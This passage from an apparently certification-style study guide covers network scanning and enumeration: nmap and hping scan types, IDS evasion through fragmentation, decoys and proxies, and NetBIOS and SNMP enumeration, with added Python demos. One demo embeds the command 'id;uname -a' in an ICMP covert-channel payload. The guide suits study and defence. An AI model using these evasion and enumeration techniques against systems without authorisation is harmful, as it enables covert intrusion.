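    for probe in ("172.16.0.0", "172.20.33.7", "172.31.255.255", "255.255.255.255"):
        print(f"{probe:>16} -> {classify(probe, '172.20.33.7/12')}")
```

Knowing the directed broadcast of a target subnet matters during scanning: that is the address an ICMP echo scan sends to, and the one that must be excluded from host lists so it is not reported as a live machine.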
84 |
85 | ### Scanning Methodology
86 |
87 | - **Check for live systems** - ping or other type of way to determine live hosts
88 | - **Check for open ports** - once you know live host IPs, scan them for listening ports
89 | - **Scan beyond IDS** - if needed, use evasion techniques so the scans are not blocked or logged by the detection systems
90 | - **Perform banner grabbing** - grab banners from the services found and fingerprint the OS
91 | - **Scan for vulnerabilities** - use tools to look for known vulnerabilities on the live systems
92 | - **Draw network diagrams** - shows the logical and physical pathways into the network
93 | - **Prepare proxies** - route the scans through proxies to obscure their origin and keep you hidden
94 |
95 | ### Identifying Targets
96 |
97 | - The easiest way to scan for live systems is through ICMP.
98 |
99 | - It has its shortcomings: ICMP is often blocked, so a host that does not answer may still be live.
100 |
101 | - **Message Types and Returns**
102 |
103 | | ICMP Message Type | Description and Codes |
104 | | --------------------------- | ------------------------------------------------------------ |
105 | | 0: Echo Reply | Answer to a Type 8 Echo Request |
106 | | 3: Destination Unreachable | Error message followed by these codes:<br>0 - Destination network unreachable<br>1 - Destination host unreachable<br>6 - Network unknown<br>7 - Host unknown<br>9 - Network administratively prohibited<br>10 - Host administratively prohibited<br>13 - Communication administratively prohibited |
107 | | 4: Source Quench | A congestion control message |
108 | | 5: Redirect | Sent when there are two or more gateways available for the sender to use. Followed by these codes:<br>0 - Redirect datagram for the network<br>1 - Redirect datagram for the host |
109 | | 8: Echo Request | A ping message, requesting an echo reply |
110 | | 11: Time Exceeded | Packet took too long to be routed (code 0 is TTL expired) |
111 |
112 | - The payload of an ICMP message can be anything; the RFC never specified what it should contain. This allows covert channels (data smuggled inside echo payloads)
113 | - **Ping sweep** - easiest method to identify hosts: send an Echo Request to every address in a range and note who replies
114 | - **ICMP Echo scanning** - sending an ICMP Echo Request to the network's broadcast address so every live host answers at once (most modern systems ignore broadcast pings)
115 | - An ICMP return of type 3 with a code of 13 (communication administratively prohibited) means a filtering device rejected the probe instead of silently dropping it, which gives the firewall away
116 | - **Ping scanning tools**
117 | - Nmap
118 | - Angry IP Scanner
119 | - Solar-Winds Engineer Toolkit
120 | - Advanced IP Scanner
121 | - Pinkie
122 | - Nmap always does host discovery (a ping sweep) before port scanning unless you turn it off with -Pn
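
An added example (not the study guide's own code) that builds and decodes ICMP messages with the types and codes listed above, checks the RFC 1071 checksum, and flags the type 3 / code 13 reply that gives a firewall away. The echo payload and the quoted datagram are constructed for the demo.

```python
import struct

ICMP_TYPES = {0: "Echo Reply", 3: "Destination Unreachable", 4: "Source Quench",
              5: "Redirect", 8: "Echo Request", 11: "Time Exceeded"}
CODES = {
    3: {0: "network unreachable", 1: "host unreachable", 6: "network unknown", 7: "host unknown",
        9: "network administratively prohibited", 10: "host administratively prohibited",
        13: "communication administratively prohibited"},
    5: {0: "redirect for the network", 1: "redirect for the host"},
    11: {0: "TTL expired in transit"},
}
# Type 3 codes that reveal a filtering device answering instead of silently dropping
FIREWALL_CODES = {9, 10, 13}


def checksum(data):
    """RFC 1071 one's-complement checksum over the whole ICMP message."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(icmp_type, code, rest=b"\x00\x00\x00\x00", payload=b""):
    """Generic builder: type, code, checksum, 4-byte 'rest of header', then payload."""
    head = struct.pack("!BBH", icmp_type, code, 0) + rest + payload
    return struct.pack("!BBH", icmp_type, code, checksum(head)) + rest + payload


def build_echo_request(ident, seq, payload=b""):
    """Type 8: the payload is whatever the sender wants, which is why ping can carry a covert channel."""
    return build_icmp(8, 0, struct.pack("!HH", ident, seq), payload)


def build_unreachable(code, original_datagram):
    """Type 3: quotes the IP header plus the first 8 bytes of the datagram that was rejected."""
    return build_icmp(3, code, b"\x00\x00\x00\x00", original_datagram[:28])


def parse_icmp(data):
    """Decode an ICMP message, verify its checksum and say what the type/code means to a scanner."""
    if len(data) < 8:
        raise ValueError("ICMP message shorter than 8 bytes")
    icmp_type, code, _ = struct.unpack("!BBH", data[:4])
    info = {"type": icmp_type, "code": code, "checksum_ok": checksum(data) == 0,
            "name": ICMP_TYPES.get(icmp_type, f"type {icmp_type}"),
            "detail": CODES.get(icmp_type, {}).get(code, f"code {code}"),
            "payload": data[8:]}
    if icmp_type in (0, 8):
        info["ident"], info["seq"] = struct.unpack("!HH", data[4:8])
    if icmp_type == 3 and code in FIREWALL_CODES:
        info["verdict"] = "filtered: a firewall/ACL rejected the probe and revealed itself"
    elif icmp_type == 0:
        info["verdict"] = "host is up"
    elif icmp_type == 3:
        info["verdict"] = "unreachable (routing problem, not necessarily a filter)"
    else:
        info["verdict"] = "informational"
    info["description"] = f"{info['name']}: {info['detail']}"
    return info


if __name__ == "__main__":
    # Constructed covert-channel style payload inside an otherwise normal ping
    print(parse_icmp(build_echo_request(0x1234, 1, b"id;uname -a")))
    print(parse_icmp(build_unreachable(13, b"\x45\x00" + b"\x00" * 26))["verdict"])
```

`parse_icmp` expects the ICMP message only (strip the IP header first when reading from a raw socket or a capture); a `checksum_ok` of False on a captured packet usually means the capture was truncated rather than that the sender was malicious.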
123 |
124 | ### Port Scan Types
125 |
126 | - **Full connect** - TCP connect or full open scan - completes the three-way handshake, then tears the connection down with RST
127 | - Easiest to detect (the application sees and can log the connection), but most reliable; needs no raw-socket privileges
128 | - nmap -sT
129 | - **Stealth** - half-open scan or SYN scan - sends only a SYN and never completes the handshake (a SYN/ACK is answered with RST). Responses are interpreted the same as a full connect scan.
130 | - Useful for hiding efforts (the application never sees a connection) and for evading older firewalls; needs raw-socket privileges (root/administrator)
131 | - nmap -sS
132 | - **Inverse TCP flag** - uses the FIN, URG or PSH flags (or no flags at all). An open port gives no response; a closed port gives RST/ACK
133 | - nmap -sN (Null scan, no flags set)
134 | - nmap -sF (FIN scan)
135 | - **Xmas** - so named because flags are turned on so the packet is "lit up" like a Christmas tree; nmap's -sX sets FIN, PSH and URG
136 | - Responses are the same as an inverse TCP scan
137 | - Does not work against Windows machines (they reply RST to every probe regardless of port state, so every port looks closed)
138 | - nmap -sX
139 | - **ACK flag probe** - multiple methods
140 | - TTL version - compare the TTL of the RST replies; a port whose RST comes back with a lower TTL (e.g. < 64 while the others are 64) is open. An old heuristic that most modern stacks no longer exhibit
141 | - Window version - if the Window field on the RST reply is anything other than 0, the port is open (again depends on the target's stack)
142 | - Can be used to check filtering: if an ACK is sent and there is no response (or an ICMP unreachable comes back), a stateful firewall is filtering the port; a RST means the port is unfiltered
143 | - nmap -sA (ACK scan)
144 | - nmap -sW (Window scan)
145 | - **IDLE Scan** - uses a third party (the zombie) to check if a port is open, so the target never sees the scanner's address
146 | - Looks at the zombie's IP ID (IPID) field, which must increase predictably with every packet the zombie sends
147 | - Only works if the third party isn't transmitting other traffic
148 | - Sends a SYN/ACK to the zombie and reads the IPID from its RST; then sends a SYN to the target spoofed with the zombie's source address; then probes the zombie again to see how much the IPID increased.
149 | - IPID increase of 1 indicates port closed (the target sent the zombie a RST, which the zombie ignores)
150 | - IPID increase of 2 indicates port open (the target sent the zombie a SYN/ACK, which the zombie answered with a RST)
151 | - IPID increase of anything greater indicates the third party was not idle
152 | - nmap -sI zombieIP target
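
To make the response rules above concrete, an added example (not from the study guide) that maps each scan type's reply to the port state nmap would report, and simulates the IDLE scan's IP ID arithmetic with a zombie whose IP ID wraps at 16 bits. The Windows behaviour is modelled as every FIN/NULL/Xmas probe being answered with RST; the IP ID values are arbitrary.

```python
# Replies a scanner can observe for a probe (after retries)
SYNACK, RST, ICMP_UNREACH, NONE = "SYN/ACK", "RST", "ICMP-unreachable", None


def classify(scan, reply):
    """Map (scan type, reply) to the port state nmap would report."""
    if scan in ("connect", "syn"):                 # -sT / -sS
        table = {SYNACK: "open", RST: "closed", ICMP_UNREACH: "filtered", NONE: "filtered"}
    elif scan in ("fin", "null", "xmas"):          # -sF / -sN / -sX: RFC 793 says open ports stay silent
        table = {NONE: "open|filtered", RST: "closed", ICMP_UNREACH: "filtered"}
    elif scan == "ack":                             # -sA: only tells filtered from unfiltered
        table = {RST: "unfiltered", NONE: "filtered", ICMP_UNREACH: "filtered"}
    else:
        raise ValueError(f"unknown scan type {scan!r}")
    if reply not in table:
        raise ValueError(f"{reply!r} is not a valid reply to a {scan} scan")
    return table[reply]


def window_scan(rst_window):
    """-sW: some stacks set a non-zero window on the RST for open ports."""
    return "open" if rst_window > 0 else "closed"


def inverse_scan(port_open, target_os):
    """What a FIN/NULL/Xmas probe actually gets back. Windows (and some other stacks)
    answer RST for every port, so the scan cannot tell open from closed there."""
    if target_os == "windows":
        return classify("fin", RST)
    return classify("fin", NONE if port_open else RST)


class Zombie:
    """Idle host whose IP ID goes up by one for every packet it emits, as -sI needs."""

    def __init__(self, ipid=1000):
        self.ipid = ipid

    def emit(self):
        self.ipid = (self.ipid + 1) & 0xFFFF        # 16-bit field, wraps
        return self.ipid

    def receive(self, segment):
        # An unsolicited SYN/ACK provokes a RST (one more packet, one more IP ID);
        # a RST is silently dropped
        if segment == SYNACK:
            self.emit()


def interpret_idle(ipid_before, ipid_after):
    delta = (ipid_after - ipid_before) & 0xFFFF
    return {1: "closed|filtered", 2: "open"}.get(delta, f"zombie not idle (delta {delta})")


def idle_scan_port(zombie, port_open):
    """One -sI probe: read the zombie's IP ID, spoof a SYN to the target as the zombie, read again."""
    before = zombie.emit()                              # zombie answers our SYN/ACK with a RST
    target_reply = SYNACK if port_open else RST         # goes to the zombie, never to us
    zombie.receive(target_reply)
    after = zombie.emit()                               # second probe, second RST
    return interpret_idle(before, after)


if __name__ == "__main__":
    z = Zombie(ipid=0xFFFE)                             # wraps during the first probe
    print("open port  ->", idle_scan_port(z, True))
    print("closed port->", idle_scan_port(z, False))
    print("xmas vs windows:", inverse_scan(True, "windows"), "| vs linux:", inverse_scan(True, "linux"))
```

The "closed|filtered" result for a delta of 1 is deliberate: a filtered port produces no reply to the zombie either, so an IDLE scan cannot separate the two, exactly as nmap reports it.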
153 |
154 | ### Nmap Switches
155 |
156 | | Switch | Description |
157 | | --------------- | ------------------------------------------------------------ |
158 | | -sA | ACK scan |
159 | | -sF | FIN scan |
160 | | -sI | IDLE scan |
161 | | -sL | List scan (reverse-DNS lookup of the targets; no probes are sent) |
162 | | -sN | NULL scan |
163 | | -sO | Protocol scan (tests which IP protocols respond) |
164 | | -sP | Ping scan (host discovery only; newer nmap versions call this -sn) |
165 | | -sR | RPC scan (legacy; now folded into version detection, -sV) |
166 | | -sS | SYN scan |
167 | | -sT | TCP connect scan |
168 | | -sW | Window scan |
169 | | -sX | XMAS scan |
170 | | -A | OS detection, version detection, script scanning and traceroute |
171 | | -PI | ICMP echo ping (legacy; now -PE) |
172 | | -P0 | No ping (the digit zero; legacy, now -Pn: skip host discovery and treat every host as up) |
173 | | -PS | TCP SYN ping |
174 | | -PT | TCP ping (legacy; now -PS for a SYN ping or -PA for an ACK ping) |
175 | | -oN | Normal output |
176 | | -oX | XML output |
177 | | -T0 through -T2 | Serial scans. T0 is slowest |
178 | | -T3 through -T5 | Parallel scans. T3 is slowest |
179 |
180 | - Nmap runs at the T3 (normal) timing level by default
181 | - **Fingerprinting** - used loosely (and on the exam) as another word for port sweeping and enumeration; strictly, identifying an OS or service version from how it responds to probes
182 |
183 | ### Hping
184 |
185 | - Another powerful ping sweep and port scanning tool
186 | - Can also craft arbitrary packets (any flag combination, any port, spoofed source)
187 | - hping3 -1 IPaddress (ICMP echo to a host)
188 |
189 | | Switch | Description |
190 | | ------- | ------------------------------------------------------------ |
191 | | -1 | Sets ICMP mode |
192 | | -2 | Sets UDP mode |
193 | | -8 | Sets scan mode. Takes the port range as its argument instead of -p (e.g. hping3 -8 20-80 -S target) |
194 | | -9 | Listen mode. Expects signature (e.g. HTTP) and interface (-I eth0) |
195 | | --flood | Sends packets as fast as possible without showing incoming replies |
196 | | -Q | Collects sequence numbers generated by the host |
197 | | -p | Sets port number |
198 | | -F | Sets the FIN flag |
199 | | -S | Sets the SYN flag |
200 | | -R | Sets the RST flag |
201 | | -P | Sets the PSH flag |
202 | | -A | Sets the ACK flag |
203 | | -U | Sets the URG flag |
204 | | -X | Sets the unused "X" flag (0x40, the ECE bit), not a real Xmas probe; send an Xmas probe with -F -P -U |
205 |
206 | ### Evasion
207 |
208 | - To evade an IDS, sometimes you need to change the way you scan
209 | - One method is to fragment packets so the TCP header is split across several IP fragments (nmap -f); an IDS that does not reassemble fragments never sees the flags it is matching on
210 | - **OS Fingerprinting**
211 | - **Active** - sending crafted packets to the target and comparing the responses against a signature database (nmap -O)
212 | - **Passive** - sniffing network traffic for values such as TTL, window size, the DF flag and the ToS field
213 | - **Spoofing** - forging the source address; can only be used when you don't need a response back to your machine
214 | - **Source routing** - lets the sender specify the path a packet should take through the network; most systems drop source-routed packets now
215 | - **IP Address Decoy** - sends probes from your IP as well as from multiple decoy IPs so the IDS/firewall cannot tell which source the attack is really coming from
216 | - nmap -D RND:10 x.x.x.x (ten random decoys)
217 | - nmap -D decoyIP1,decoyIP2,...,ME,... [target] (ME marks where your real address goes in the order)
218 | - **Proxy** - hides the true identity by sending traffic through another computer. Also used for other purposes such as bypassing content blocking
219 | - **Proxy chains** - chaining multiple proxies together so no single proxy sees both ends
220 | - Proxy Switcher
221 | - Proxy Workbench
222 | - ProxyChains
223 | - **Tor** - a specific type of proxy that uses multiple encrypted hops (relays) to a destination; traffic leaves through a volunteer-run exit node
224 | - **Anonymizers** - web services that hide your identity for HTTP traffic (port 80)
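
An added example of the fragmentation trick behind nmap -f (not code from the study guide): a TCP SYN header is cut into 8-byte IP fragments, a naive rule that reads the flags byte of each packet it sees misses the SYN, and an inspector that reassembles first catches it. The port and sequence number values are arbitrary.

```python
import struct


def tcp_syn(sport, dport, seq):
    """Minimal 20-byte TCP SYN header (checksum left 0); the flags byte is at offset 13."""
    return struct.pack("!HHIIHHHH", sport, dport, seq, 0, (5 << 12) | 0x02, 1024, 0, 0)


def fragment(payload, chunk=8):
    """Split a transport segment into IP fragments the way nmap -f does (8-byte pieces).
    The IP fragment-offset field counts 8-byte units, so chunk must be a multiple of 8."""
    if chunk % 8:
        raise ValueError("fragment size must be a multiple of 8")
    frags = []
    for start in range(0, len(payload), chunk):
        frags.append({"offset": start // 8,                      # in 8-byte units
                      "mf": start + chunk < len(payload),        # More Fragments bit
                      "data": payload[start:start + chunk]})
    return frags


def naive_syn_signature(frag):
    """An IDS rule that reads the TCP flags byte from whatever packet it is handed.
    With 8-byte fragments the flags live in the second fragment, which has a non-zero
    offset and no TCP header of its own, so the rule never fires."""
    data = frag["data"]
    return frag["offset"] == 0 and len(data) >= 14 and bool(data[13] & 0x02)


def reassemble(frags):
    """What a reassembling IDS (or the target's IP stack) does before inspecting."""
    buf = bytearray()
    ordered = sorted(frags, key=lambda f: f["offset"])
    for f in ordered:
        if f["offset"] * 8 != len(buf):
            raise ValueError(f"gap or overlap at fragment offset {f['offset']}")
        buf += f["data"]
    if ordered and ordered[-1]["mf"]:
        raise ValueError("last fragment still has MF set: incomplete")
    return bytes(buf)


def reassembling_syn_signature(frags):
    return naive_syn_signature({"offset": 0, "mf": False, "data": reassemble(frags)})


if __name__ == "__main__":
    syn = tcp_syn(40000, 22, 12345)
    frags = fragment(syn)
    print("fragments:", [(f["offset"], f["mf"], f["data"].hex()) for f in frags])
    print("naive rule hit?       ", any(naive_syn_signature(f) for f in frags))
    print("reassembling rule hit?", reassembling_syn_signature(frags))
```

Nmap's `--mtu` option does the same with larger multiples of 8; the defence is the same in every case: inspect after reassembly, and treat fragments that never complete (or overlap) as suspicious rather than ignoring them.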
225 |
226 | ### Vulnerability Scanning
227 |
228 | - Ranges from simple scripts to complex commercial products run against a target to find known vulnerabilities
229 | - Industry standard is Tenable's Nessus
230 | - Other options include
231 | - GFI LanGuard
232 | - Qualys
233 | - Qualys FreeScan - best known for testing websites and applications
234 | - OpenVAS - the best-known free (open source) competitor to Nessus
235 |
236 | ### Enumeration
237 |
238 | - Defined as listing the items (users, groups, shares, services and so on) found on a specific target
239 | - Always active in nature: you connect to the target and query it, so it can be logged
240 |
241 | ### Windows System Basics
242 |
243 | - Everything runs within the context of an account
244 | - **Security Context** - the user identity and authentication information a process runs with
245 | - **Security Identifier** (SID) - uniquely identifies a user, group or computer account
246 | - **Relative Identifier** (RID) - the last portion of the SID, identifying a specific user, group or computer within its domain or machine
247 | - The end of the SID (the RID) indicates the account number
248 | - Example SID: S-1-5-21-3874928736-367528774-1298337465-**500**
249 | - **Administrator Account** - RID of 500 (the Guest account is 501)
250 | - **Regular Accounts** - RIDs start at 1000
251 | - **Linux Systems** use user IDs (UID) and group IDs (GID), found in /etc/passwd and /etc/group
252 | - **SAM Database** - file where the local account password hashes are stored (the hashes, not the passwords; the file is locked while Windows is running)
253 | - Stored in C:\Windows\System32\Config\SAM
254 | - **Linux Enumeration Commands**
255 | - **finger** - info on users and the host machine
256 | - **rpcinfo and rpcclient** - info on RPC services (rpcinfo for ONC RPC, rpcclient for MS-RPC over SMB)
257 | - **showmount** - displays all NFS directories exported by the machine
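
SID handling as an added example (not from the study guide): string and binary SID parsing, the RID classification described above, and a same-domain check. The binary layout used (revision byte, sub-authority count, 48-bit big-endian identifier authority, little-endian sub-authorities) is the standard Windows one; the well-known RID table follows Microsoft's published list; the sample SIDs are made up.

```python
import struct

# Well-known RIDs; everything from 1000 upward is an account or group an administrator created
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt (KDC service account)",
                   512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
                   518: "Schema Admins", 519: "Enterprise Admins"}


def parse_sid(sid):
    """Split S-R-A-S1-S2-...-RID into revision, identifier authority, sub-authorities and RID."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError(f"not a SID: {sid!r}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if revision != 1 or authority >= 2 ** 48 or any(s >= 2 ** 32 for s in subs):
        raise ValueError(f"out-of-range SID component in {sid!r}")
    # S-1-5-21-x-y-z is a domain or machine SID; accounts append one more sub-authority, the RID
    domain = "-".join(parts[:7]) if len(subs) >= 4 and subs[0] == 21 else None
    return {"revision": revision, "authority": authority, "subauthorities": subs,
            "rid": subs[-1] if subs else None, "domain": domain}


def describe_rid(rid):
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    if rid >= 1000:
        return "regular (user-created) account or group"
    return "built-in/reserved"


def sid_to_bytes(sid):
    """Binary form as stored in SAM/AD and carried in security descriptors."""
    p = parse_sid(sid)
    subs = p["subauthorities"]
    return (bytes([p["revision"], len(subs)]) + p["authority"].to_bytes(6, "big")
            + struct.pack(f"<{len(subs)}I", *subs))


def sid_from_bytes(raw):
    revision, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack(f"<{count}I", raw[8:8 + 4 * count])
    return "-".join(["S", str(revision), str(authority)] + [str(s) for s in subs])


def same_domain(sid_a, sid_b):
    """Two account SIDs with the same domain prefix belong to the same domain or machine."""
    a, b = parse_sid(sid_a)["domain"], parse_sid(sid_b)["domain"]
    return a is not None and a == b


if __name__ == "__main__":
    for s in ("S-1-5-21-3874928736-367528774-1298337465-500",
              "S-1-5-21-3874928736-367528774-1298337465-1104",
              "S-1-5-32-544"):
        p = parse_sid(s)
        print(f"{s}: rid={p['rid']} ({describe_rid(p['rid'])}) domain={p['domain']}")
        print("  binary:", sid_to_bytes(s).hex())
```

The domain prefix check is what makes RID cycling work during enumeration: once one account's SID is known, every other account in that domain has the same prefix and only the RID differs.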
258 |
259 | ### Banner Grabbing
260 |
261 | - **Active** - sending specially crafted packets and comparing responses to determine the OS or service
262 | - **Passive** - reading error messages, sniffing traffic or looking at page extensions
263 | - Easy way to banner grab is to connect via telnet to the port (e.g. 80 for a web server), read what the service sends, or send a request such as HEAD / HTTP/1.0
264 | - **Netcat** can also be used to banner grab
265 | - nc -v target 80
266 | - Can be used to get information about the OS or the specific server software (such as web server, mail server, etc.)
267 |
268 | ### NetBIOS Enumeration
269 |
270 | - NetBIOS provides name service, connectionless (datagram) communication and session-layer services
271 | - The browser service in Windows is designed to hold information about all machines within a domain or TCP/IP network segment
272 | - A NetBIOS name is a **16-character ASCII string**: up to 15 characters of name (space-padded) plus a 16th suffix character that identifies the service
273 | - Command on Windows is **nbtstat**
274 | - nbtstat (with no switches prints the usage text)
275 | - nbtstat -n (gives the local name table)
276 | - nbtstat -A IPADDRESS (gives the remote machine's name table, looked up by IP address)
277 | - nbtstat -c (gives the name cache)
278 |
279 | | Code | Type | Meaning |
280 | | ---- | ------ | ------------------------- |
281 | | <1B> | UNIQUE | Domain master browser |
282 | | <1C> | GROUP | Domain controllers |
283 | | <1D> | UNIQUE | Master browser for the subnet |
284 | | <00> | UNIQUE | Hostname (workstation service) |
285 | | <00> | GROUP | Domain name |
286 | | <03> | UNIQUE | Messenger service running on the system |
287 | | <20> | UNIQUE | Server (file sharing) service running |
288 |
289 | - NetBIOS name resolution doesn't work on IPv6 (NetBIOS over TCP/IP is IPv4 only)
290 | - **Other Tools**
291 | - SuperScan
292 | - Hyena
293 | - NetBIOS Enumerator
294 | - NSAuditor
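
An added example (not code from the study guide) of the wire format behind nbtstat -A: NetBIOS first-level name encoding, the 50-byte node status query sent to UDP/137, and a parser for the name table in the reply, using the suffix/type meanings from the table above. The reply parsed here is constructed by build_node_status_response, not captured from a real host; the hostname, domain and MAC address are invented.

```python
import struct

# (suffix, UNIQUE/GROUP) -> service, per Microsoft's NetBIOS suffix list
NAME_MEANINGS = {
    (0x00, "UNIQUE"): "Workstation service (hostname)", (0x00, "GROUP"): "Domain/workgroup name",
    (0x03, "UNIQUE"): "Messenger service",              (0x20, "UNIQUE"): "File server service",
    (0x1B, "UNIQUE"): "Domain master browser",          (0x1C, "GROUP"): "Domain controllers",
    (0x1D, "UNIQUE"): "Master browser",                 (0x1E, "GROUP"): "Browser service elections",
}
NBSTAT = 0x0021   # node status record type


def encode_name(name, suffix=0x00):
    """First-level encoding: 15-byte space-padded name + suffix byte, each nibble written as 'A'+nibble.
    The wildcard '*' used by node status queries is '*' followed by 15 NUL bytes."""
    if name == "*":
        raw = b"*" + b"\x00" * 15
    else:
        raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    return "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0x0F)) for b in raw)


def decode_name(encoded):
    raw = bytes(((ord(encoded[i]) - 0x41) << 4) | (ord(encoded[i + 1]) - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" \x00"), raw[15]


def build_node_status_query(txid):
    """The 50-byte UDP/137 packet nbtstat -A sends: header, wildcard name, type NBSTAT, class IN."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    qname = encode_name("*").encode("ascii")
    return header + bytes([len(qname)]) + qname + b"\x00" + struct.pack("!HH", NBSTAT, 1)


def build_node_status_response(txid, names, mac):
    """Constructed reply: NUM_NAMES entries of 15-byte name, suffix, 2-byte flags (bit 15 = GROUP), then MAC."""
    rdata = bytes([len(names)])
    for name, suffix, is_group in names:
        flags = (0x8000 if is_group else 0x0000) | 0x0400          # 0x0400: name is ACTIVE
        rdata += name.upper().encode("ascii").ljust(15, b" ") + bytes([suffix]) + struct.pack("!H", flags)
    rdata += mac + b"\x00" * 40                                     # statistics block, zeroed here
    rname = encode_name("*").encode("ascii")
    header = struct.pack("!HHHHHH", txid, 0x8400, 0, 1, 0, 0)       # response, authoritative answer
    rr = bytes([len(rname)]) + rname + b"\x00" + struct.pack("!HHIH", NBSTAT, 1, 0, len(rdata))
    return header + rr + rdata


def parse_node_status_response(data):
    txid, _flags, _qd, ancount, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    if ancount != 1:
        raise ValueError("expected exactly one answer record")
    pos = 12
    pos += 1 + data[pos] + 1                                         # length byte, encoded name, terminator
    rtype, _rclass, _ttl, _rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
    pos += 10
    if rtype != NBSTAT:
        raise ValueError(f"not a node status record: type {rtype:#x}")
    count, pos = data[pos], pos + 1
    names = []
    for _ in range(count):
        raw, suffix = data[pos:pos + 15], data[pos + 15]
        nflags = struct.unpack("!H", data[pos + 16:pos + 18])[0]
        pos += 18
        kind = "GROUP" if nflags & 0x8000 else "UNIQUE"
        names.append((raw.decode("ascii").rstrip(), suffix, kind, NAME_MEANINGS.get((suffix, kind), "unknown")))
    mac = ":".join(f"{b:02x}" for b in data[pos:pos + 6])
    return {"txid": txid, "names": names, "mac": mac}


if __name__ == "__main__":
    reply = build_node_status_response(0xBEEF, [("WKSTN01", 0x00, False), ("CORP", 0x00, True),
                                                ("WKSTN01", 0x20, False), ("CORP", 0x1C, True)],
                                       bytes.fromhex("001122334455"))
    for name, suffix, kind, meaning in parse_node_status_response(reply)["names"]:
        print(f"{name:<15} <{suffix:02X}> {kind:<6} {meaning}")
```

Sending `build_node_status_query` to UDP port 137 of a live host and feeding the answer to `parse_node_status_response` reproduces what nbtstat -A shows; the <1C> GROUP entry in the output is the quickest way to spot a domain controller.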
295 |
296 | ### SNMP Enumeration
297 |
298 | - **Management Information Base** (MIB) - hierarchical database of the objects a device can report or accept
299 | - **Object Identifiers** (OID) - dotted numeric identifiers for the objects in the MIB (e.g. 1.3.6.1.2.1.1.1.0 is sysDescr.0)
300 | - **SNMP GET** - reads information from the system
301 | - **SNMP SET** - changes information on the system
302 | - **Types of objects**
303 | - **Scalar** - single object
304 | - **Tabular** - multiple related objects that can be grouped together
305 | - SNMP uses community strings which function as passwords
306 | - There is a read-only and a read-write version
307 | - Default read-only string is **public** and default read-write is **private**
308 | - These are sent in cleartext in SNMP v1 and v2c; only SNMP v3 adds authentication and encryption
309 | - **Tools**
310 | - Engineer's Toolset
311 | - SNMPScanner
312 | - OpUtils 5
313 | - SNScan
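
Added example (not the study guide's) showing why v1/v2c community strings are trivial to sniff: it BER-encodes an SNMPv1 GetRequest for sysDescr.0 and then decodes the same bytes the way a passive listener on UDP/161 would, pulling out the version, the community string, the PDU type and the OID. The packet is built locally; nothing is sent, and the hostname used in the SET example is invented.

```python
def ber_length(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, body):
    return bytes([tag]) + ber_length(len(body)) + body


def ber_integer(value):
    """Minimal-length two's-complement INTEGER (non-negative values only, enough for SNMP headers)."""
    if value < 0:
        raise ValueError("negative values not needed here")
    return tlv(0x02, value.to_bytes((value.bit_length() + 8) // 8, "big"))


def encode_oid(oid):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128 with continuation bits."""
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += chunk
    return tlv(0x06, bytes(out))


PDU_TAGS = {"get": 0xA0, "getnext": 0xA1, "set": 0xA3}
PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse", 0xA3: "SetRequest"}


def snmpv1_request(community, oid, kind="get", value=b"\x05\x00", request_id=1):
    """Build an SNMPv1 message; value is the BER-encoded value (NULL for GET, e.g. an OCTET STRING for SET)."""
    varbind = tlv(0x30, encode_oid(oid) + value)
    pdu = tlv(PDU_TAGS[kind], ber_integer(request_id) + ber_integer(0) + ber_integer(0) + tlv(0x30, varbind))
    return tlv(0x30, ber_integer(0) + tlv(0x04, community.encode()) + pdu)   # version 0 = SNMPv1


def read_tlv(data, pos=0):
    tag, length, pos = data[pos], data[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(data[pos:pos + n], "big"), pos + n
    return tag, data[pos:pos + length], pos + length


def decode_oid(body):
    arcs, value = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def sniff(packet):
    """What a passive listener sees in a v1/v2c message: the community string is a plain OCTET STRING."""
    tag, body, _ = read_tlv(packet)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, version, pos = read_tlv(body)
    _, community, pos = read_tlv(body, pos)
    pdu_tag, pdu, _ = read_tlv(body, pos)
    _, reqid, p = read_tlv(pdu)
    _, _, p = read_tlv(pdu, p)           # error-status
    _, _, p = read_tlv(pdu, p)           # error-index
    _, varbinds, _ = read_tlv(pdu, p)
    _, first_vb, _ = read_tlv(varbinds)
    _, oid_body, _ = read_tlv(first_vb)
    return {"version": int.from_bytes(version, "big"), "community": community.decode(),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)), "request_id": int.from_bytes(reqid, "big"),
            "oid": decode_oid(oid_body)}


if __name__ == "__main__":
    pkt = snmpv1_request("public", "1.3.6.1.2.1.1.1.0")
    print(pkt.hex())
    print(sniff(pkt))
```

Writing the packet to a UDP socket aimed at port 161 is all an SNMP walker does; the same `sniff` applied to captured UDP/161 datagrams is how a read-write community string ends up in an attacker's hands on a v1/v2c network.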
314 |
315 | ### Other Enumerations
316 |
317 | - **LDAP**
